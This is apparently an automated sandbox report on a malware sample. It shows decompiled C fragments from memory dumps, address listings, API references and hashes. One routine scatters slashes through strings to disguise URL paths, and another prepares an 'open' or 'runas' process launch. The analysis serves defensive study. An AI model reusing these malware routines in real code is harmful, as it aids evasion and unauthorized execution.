                                                                                                                                                                                                                                0x00a81ac5
                                                                                                                                                                                                                                0x00a81ace
                                                                                                                                                                                                                                0x00a81ad2
                                                                                                                                                                                                                                0x00a81ae3
                                                                                                                                                                                                                                0x00a81ad4
                                                                                                                                                                                                                                0x00a81ad9
                                                                                                                                                                                                                                0x00a81ade
                                                                                                                                                                                                                                0x00a81aed
                                                                                                                                                                                                                                0x00a81aed
                                                                                                                                                                                                                                0x00a81ac2
                                                                                                                                                                                                                                0x00a81af3
                                                                                                                                                                                                                                0x00a81af9
                                                                                                                                                                                                                                0x00a81af9
                                                                                                                                                                                                                                0x00a81b02
                                                                                                                                                                                                                                0x00a81b07
                                                                                                                                                                                                                                0x00a81b07
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1198164300-0
                                                                                                                                                                                                                                • Opcode ID: 0b52c1f7f0ac5d0646e4271f2a50b9b604ff87c5ef53b3c74879fa6db4c25d50
                                                                                                                                                                                                                                • Instruction ID: 67e9044e1d2e51bbf6947c703e16504b0b6e693dad42d1730c3816508fe49836
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b52c1f7f0ac5d0646e4271f2a50b9b604ff87c5ef53b3c74879fa6db4c25d50
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52214475901209EFCB11EFE4D988D9EBBB8FF48351B104169E905D7210E770DA41CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9C93, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                			E736D9C93(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x736eb050; // 0x4
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E736DA236(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E736DBC10(__eflags,  *0x736eb050, _t51);
							if(__eflags != 0) {
								E736D9A91(_t51, 0x736efafc);
								E736DA293(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E736DBC10(__eflags,  *0x736eb050, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E736DBC10(0,  *0x736eb050, 0);
							_push(0);
							L9:
							E736DA293();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E736DBBD1(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x736eb050; // 0x4
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E736D9798(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x736eb050; // 0x4
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E736DBC10(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E736DA236(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E736DBC10(__eflags,  *0x736eb050, _t60);
								if(__eflags != 0) {
									E736D9A91(_t60, 0x736efafc);
									E736DA293(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E736DBC10(__eflags,  *0x736eb050, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E736DBC10(__eflags,  *0x736eb050, _t20);
								_push(_t60);
								L25:
								E736DA293();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E736DBBD1(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x736eb050; // 0x4
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E736D9798(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x736eb050; // 0x4
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E736DBC10(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E736DA236(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E736DBC10(__eflags,  *0x736eb050, _t54);
											if(__eflags != 0) {
												E736D9A91(_t54, 0x736efafc);
												E736DA293(0);
												goto L45;
											} else {
												_t40 = 0;
												E736DBC10(__eflags,  *0x736eb050, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E736DBC10(0,  *0x736eb050, 0);
											_push(0);
											L41:
											E736DA293();
											goto L36;
										}
									}
								} else {
									_t54 = E736DBBD1(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x736eb050; // 0x4
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}























                                                                                                                                                                                                                                0x736d9c93
                                                                                                                                                                                                                                0x736d9c93
                                                                                                                                                                                                                                0x736d9c9e
                                                                                                                                                                                                                                0x736d9ca0
                                                                                                                                                                                                                                0x736d9ca5
                                                                                                                                                                                                                                0x736d9ca8
                                                                                                                                                                                                                                0x736d9cc6
                                                                                                                                                                                                                                0x736d9cc9
                                                                                                                                                                                                                                0x736d9cce
                                                                                                                                                                                                                                0x736d9cd0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cd2
                                                                                                                                                                                                                                0x736d9cde
                                                                                                                                                                                                                                0x736d9ce1
                                                                                                                                                                                                                                0x736d9ce2
                                                                                                                                                                                                                                0x736d9ce4
                                                                                                                                                                                                                                0x736d9d09
                                                                                                                                                                                                                                0x736d9d0b
                                                                                                                                                                                                                                0x736d9d24
                                                                                                                                                                                                                                0x736d9d2b
                                                                                                                                                                                                                                0x736d9d30
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d0d
                                                                                                                                                                                                                                0x736d9d0d
                                                                                                                                                                                                                                0x736d9d16
                                                                                                                                                                                                                                0x736d9d1b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d1b
                                                                                                                                                                                                                                0x736d9ce6
                                                                                                                                                                                                                                0x736d9ce6
                                                                                                                                                                                                                                0x736d9ce6
                                                                                                                                                                                                                                0x736d9cef
                                                                                                                                                                                                                                0x736d9cf4
                                                                                                                                                                                                                                0x736d9cf5
                                                                                                                                                                                                                                0x736d9cf5
                                                                                                                                                                                                                                0x736d9cfa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cfa
                                                                                                                                                                                                                                0x736d9ce4
                                                                                                                                                                                                                                0x736d9caa
                                                                                                                                                                                                                                0x736d9cb0
                                                                                                                                                                                                                                0x736d9cb4
                                                                                                                                                                                                                                0x736d9cc1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9cb6
                                                                                                                                                                                                                                0x736d9cb9
                                                                                                                                                                                                                                0x736d9d33
                                                                                                                                                                                                                                0x736d9d33
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbb
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cbd
                                                                                                                                                                                                                                0x736d9cb9
                                                                                                                                                                                                                                0x736d9cb4
                                                                                                                                                                                                                                0x736d9d36
                                                                                                                                                                                                                                0x736d9d3e
                                                                                                                                                                                                                                0x736d9d40
                                                                                                                                                                                                                                0x736d9d42
                                                                                                                                                                                                                                0x736d9d4a
                                                                                                                                                                                                                                0x736d9d4f
                                                                                                                                                                                                                                0x736d9d50
                                                                                                                                                                                                                                0x736d9d55
                                                                                                                                                                                                                                0x736d9d56
                                                                                                                                                                                                                                0x736d9d59
                                                                                                                                                                                                                                0x736d9d73
                                                                                                                                                                                                                                0x736d9d76
                                                                                                                                                                                                                                0x736d9d7b
                                                                                                                                                                                                                                0x736d9d7d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d7f
                                                                                                                                                                                                                                0x736d9d8b
                                                                                                                                                                                                                                0x736d9d8e
                                                                                                                                                                                                                                0x736d9d8f
                                                                                                                                                                                                                                0x736d9d91
                                                                                                                                                                                                                                0x736d9db4
                                                                                                                                                                                                                                0x736d9db6
                                                                                                                                                                                                                                0x736d9dcd
                                                                                                                                                                                                                                0x736d9dd4
                                                                                                                                                                                                                                0x736d9dd9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9db8
                                                                                                                                                                                                                                0x736d9dbf
                                                                                                                                                                                                                                0x736d9dc4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9dc4
                                                                                                                                                                                                                                0x736d9d93
                                                                                                                                                                                                                                0x736d9d9a
                                                                                                                                                                                                                                0x736d9d9f
                                                                                                                                                                                                                                0x736d9da0
                                                                                                                                                                                                                                0x736d9da0
                                                                                                                                                                                                                                0x736d9da5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9da5
                                                                                                                                                                                                                                0x736d9d91
                                                                                                                                                                                                                                0x736d9d5b
                                                                                                                                                                                                                                0x736d9d61
                                                                                                                                                                                                                                0x736d9d63
                                                                                                                                                                                                                                0x736d9d65
                                                                                                                                                                                                                                0x736d9d6e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9d67
                                                                                                                                                                                                                                0x736d9d67
                                                                                                                                                                                                                                0x736d9d6a
                                                                                                                                                                                                                                0x736d9de4
                                                                                                                                                                                                                                0x736d9de4
                                                                                                                                                                                                                                0x736d9de9
                                                                                                                                                                                                                                0x736d9dec
                                                                                                                                                                                                                                0x736d9ded
                                                                                                                                                                                                                                0x736d9dee
                                                                                                                                                                                                                                0x736d9df5
                                                                                                                                                                                                                                0x736d9df7
                                                                                                                                                                                                                                0x736d9dfc
                                                                                                                                                                                                                                0x736d9dff
                                                                                                                                                                                                                                0x736d9e1d
                                                                                                                                                                                                                                0x736d9e20
                                                                                                                                                                                                                                0x736d9e25
                                                                                                                                                                                                                                0x736d9e27
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e29
                                                                                                                                                                                                                                0x736d9e35
                                                                                                                                                                                                                                0x736d9e39
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e60
                                                                                                                                                                                                                                0x736d9e62
                                                                                                                                                                                                                                0x736d9e7b
                                                                                                                                                                                                                                0x736d9e82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e6d
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e46
                                                                                                                                                                                                                                0x736d9e4b
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e09
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e8d
                                                                                                                                                                                                                                0x736d9e95
                                                                                                                                                                                                                                0x736d9e97
                                                                                                                                                                                                                                0x736d9e97
                                                                                                                                                                                                                                0x736d9e9e
                                                                                                                                                                                                                                0x736d9d6c
                                                                                                                                                                                                                                0x736d9ddc
                                                                                                                                                                                                                                0x736d9ddc
                                                                                                                                                                                                                                0x736d9dde
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9de0
                                                                                                                                                                                                                                0x736d9de3
                                                                                                                                                                                                                                0x736d9de3
                                                                                                                                                                                                                                0x736d9dde
                                                                                                                                                                                                                                0x736d9d6a
                                                                                                                                                                                                                                0x736d9d65
                                                                                                                                                                                                                                0x736d9d44
                                                                                                                                                                                                                                0x736d9d49
                                                                                                                                                                                                                                0x736d9d49

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,736DDF75,00000000,00000001,736DC385,?,736DE432,00000001,?,?,?,736DC31E,?,00000000), ref: 736D9C98
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9CF5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9D2B
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000004,000000FF,?,736DE432,00000001,?,?,?,736DC31E,?,00000000,00000000,736E9C70,0000002C,736DC385), ref: 736D9D36
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
                                                                                                                                                                                                                                • Instruction ID: 67a44d6bcc46deb1608fb8d3d85c04aea9b8fb6d16fbc401b6060eff744216a3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851fdb5d67182659618ecdaa01b788713263788b9e48cea8b931b3184352cd74
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7111CA332697053BEF1126B68E88F1B26E9F7C3675B380628F529971C8FE7589054118
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D9DEA, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 85%
                                                                                                                                                                                                                                			E736D9DEA(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x736eb050; // 0x4
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E736DBC10(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E736DA236(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E736DBC10(__eflags,  *0x736eb050, _t18);
							if(__eflags != 0) {
								E736D9A91(_t18, 0x736efafc);
								E736DA293(0);
								goto L13;
							} else {
								_t13 = 0;
								E736DBC10(__eflags,  *0x736eb050, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E736DBC10(0,  *0x736eb050, 0);
							_push(0);
							L9:
							E736DA293();
							goto L4;
						}
					}
				} else {
					_t18 = E736DBBD1(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x736eb050; // 0x4
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                                                                                                                                                                                                                0x736d9df5
                                                                                                                                                                                                                                0x736d9df7
                                                                                                                                                                                                                                0x736d9dfc
                                                                                                                                                                                                                                0x736d9dff
                                                                                                                                                                                                                                0x736d9e1d
                                                                                                                                                                                                                                0x736d9e20
                                                                                                                                                                                                                                0x736d9e25
                                                                                                                                                                                                                                0x736d9e27
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e29
                                                                                                                                                                                                                                0x736d9e35
                                                                                                                                                                                                                                0x736d9e39
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e60
                                                                                                                                                                                                                                0x736d9e62
                                                                                                                                                                                                                                0x736d9e7b
                                                                                                                                                                                                                                0x736d9e82
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e64
                                                                                                                                                                                                                                0x736d9e6d
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e72
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e3d
                                                                                                                                                                                                                                0x736d9e46
                                                                                                                                                                                                                                0x736d9e4b
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x736d9e4c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e51
                                                                                                                                                                                                                                0x736d9e3b
                                                                                                                                                                                                                                0x736d9e01
                                                                                                                                                                                                                                0x736d9e07
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e18
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d9e0d
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e8a
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e12
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e14
                                                                                                                                                                                                                                0x736d9e10
                                                                                                                                                                                                                                0x736d9e0b
                                                                                                                                                                                                                                0x736d9e8d
                                                                                                                                                                                                                                0x736d9e95
                                                                                                                                                                                                                                0x736d9e9e

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9DEF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E4C
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736D9E82
                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000004,000000FF,?,00000001,736DA228,736DA2B9,?,?,736D94E3), ref: 736D9E8D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2283115069-0
                                                                                                                                                                                                                                • Opcode ID: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction ID: a3292ceadf456f39e1371fda9e56ad2405294d444ba4aefc0b9fc455f3a4df56
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2114873e75f4510dcb69ee662b3dc4e80ac427be31634503da50bf18635ef86d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11C6336693053BEF0222A78D84F1B22A9BFC2671B280328F129971C5FE618C154128
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8698B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                			E00A8698B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0xa8d270, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0xa8d288; // 0x5e99fac9
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0xa8d288 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                                                                                                                0x00a86993
                                                                                                                                                                                                                                0x00a86996
                                                                                                                                                                                                                                0x00a8699c
                                                                                                                                                                                                                                0x00a869b4
                                                                                                                                                                                                                                0x00a869b6
                                                                                                                                                                                                                                0x00a869bb
                                                                                                                                                                                                                                0x00a869bd
                                                                                                                                                                                                                                0x00a869c0
                                                                                                                                                                                                                                0x00a869c2
                                                                                                                                                                                                                                0x00a869c5
                                                                                                                                                                                                                                0x00a869c7
                                                                                                                                                                                                                                0x00a869c7
                                                                                                                                                                                                                                0x00a869c9
                                                                                                                                                                                                                                0x00a869d4
                                                                                                                                                                                                                                0x00a869d9
                                                                                                                                                                                                                                0x00a869ea
                                                                                                                                                                                                                                0x00a869f2
                                                                                                                                                                                                                                0x00a869f7
                                                                                                                                                                                                                                0x00a869fa
                                                                                                                                                                                                                                0x00a869fd
                                                                                                                                                                                                                                0x00a869ff
                                                                                                                                                                                                                                0x00a86a02
                                                                                                                                                                                                                                0x00a86a05
                                                                                                                                                                                                                                0x00a86a05
                                                                                                                                                                                                                                0x00a86a08
                                                                                                                                                                                                                                0x00a86a13
                                                                                                                                                                                                                                0x00a86a18
                                                                                                                                                                                                                                0x00a86a22

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00A8233E,00000000,?,?,00A8A714,?,01AE95B0), ref: 00A86996
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00A869AE
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00A8233E,00000000,?,?,00A8A714,?,01AE95B0), ref: 00A869F2
                                                                                                                                                                                                                                • memcpy.NTDLL(00000001,?,00000001), ref: 00A86A13
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1819133394-0
                                                                                                                                                                                                                                • Opcode ID: 3319510ed173b066408b0aa025cd865029ec6f714fb9fb48e82d72ee08eba249
                                                                                                                                                                                                                                • Instruction ID: 0bf8afef5ddf54504aee4add8c1d7f58a8cf783acef53b07bd55032209f27201
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3319510ed173b066408b0aa025cd865029ec6f714fb9fb48e82d72ee08eba249
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E11C272A00215EFD710DFA9DC84D9ABBBEEB843A0B15027AF50597290E6709E0597A0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86ABB, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                                                                                			E00A86ABB(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E00A810E9(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0xa8d2e0; // 0x105a5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0xa8e4e8; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0xa8e8f0; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E00A87020();
					_push( &_v64);
					if( *0xa8d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E00A87020();
				}
				return _t28;
			}














                                                                                                                                                                                                                                0x00a86abb
                                                                                                                                                                                                                                0x00a86ac2
                                                                                                                                                                                                                                0x00a86ad0
                                                                                                                                                                                                                                0x00a86ad4
                                                                                                                                                                                                                                0x00a86ade
